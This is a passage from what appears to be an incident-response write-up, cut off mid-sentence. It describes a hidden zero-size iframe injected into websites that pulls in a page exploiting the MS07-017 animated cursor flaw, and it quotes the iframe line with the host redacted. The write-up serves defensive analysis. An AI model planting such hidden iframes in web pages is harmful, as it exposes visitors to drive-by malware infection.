I recently worked on an interesting incident response with several of my colleagues. The problem, as defined by the customer, is that the following code is being injected into some websites (both external and internal to his environment) that his users are surfing:
<iframe src=http://<redacted>/ 123.htm width=0 height=0></iframe>
The page referenced (123.htm) includes a link to a .jpg file that exploits the animated cursor vulnerability in MS07-017 and some additional obfuscated JavaScript. The effect of this is that